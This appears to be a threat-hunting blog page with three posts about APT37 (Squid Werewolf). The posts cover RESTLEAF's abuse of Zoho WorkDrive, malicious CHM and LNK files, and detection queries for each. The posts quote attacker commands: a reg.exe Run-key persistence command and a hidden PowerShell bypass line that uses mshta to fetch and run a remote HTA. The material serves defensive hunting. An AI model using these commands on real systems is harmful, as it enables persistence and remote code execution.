Posts

Showing posts with the label apt37

378. Hunting for APT37: Zoho WorkDrive Abuse

Image
Hello everyone! Today we’ll talk about another legitimate service that attackers abuse - in this case, APT37. And of course, we’ll look at how to use this information for proactive threat hunting. So, in one of APT37’s fairly recent campaigns (we track this cluster as Squid Werewolf), they used the RESTLEAF implant, which abused Zoho WorkDrive - a cloud-based file management and collaboration platform. From a proactive hunting perspective, we can identify all network communications related to Zoho WorkDrive and then separate the legitimate events: event_type: "dnsreqwin" AND dns_rname: "workdrive.zohoexternal.com" See you soon!

252. Is APT37 Noisy Enough to Be Detected?

Image
Hello everyone! If you're reading this blog often, you are 100% sure that most of adversaries are extremely noisy. And yes, today we'll look at another noisy example, which belongs to APT37. The adversary leveraged malicious CHM files, which executed multiple quite interesting commands. For example, once again the adversary abused reg.exe for persistence: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OnedriveStandaloneUpdater /t REG_SZ /d Why not to hunt for such suspicious registry modifications events: event_type: "processcreatewin" AND proc_file_path: "reg.exe" AND cmdline: ("add" AND "run") Next it runs PowerShell to download a malicious HTA file and execute it via mshta.exe: Powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 473925 2.2.2.2 || mshta http://[redacted].co.kr/files/2023/12/01/1.html" /f From threat hunting perspective, it's always a good idea to hunt for PowerShel...

071. Squid Werewolf (APT37): Detection Opportunities

Image
Hello everyone! I hope you checked this report on APT37 (we track this activity cluster as Squid Werewolf) already. As always, let's look at detection opporrunities! The adversary leveraged a malicious LNK file to execute PowerShell with " -nop " argument, of course, we can use it for detection\hunting: proc_p_file_path: "explorer.exe"  AND  proc_file_name: "powershell.exe"  AND  cmdline: "nop"  Also, the threat actors abuse dfsvc.exe , and use renamed executable to run the malicious code. For example, we can search for renamed files: event_type: "processcreatewin"  AND  proc_file_originalfilename: "dfsvc.exe"  AND NOT  proc_file_name: "dfsvc.exe" One more opportunity - abusing  timeapi[.]io to check Internet connection: event_type: "dnsreq"  AND  dns_rname: "timeapi.io" Which detection and hunting opportunities have you spotted? See you tomorrow!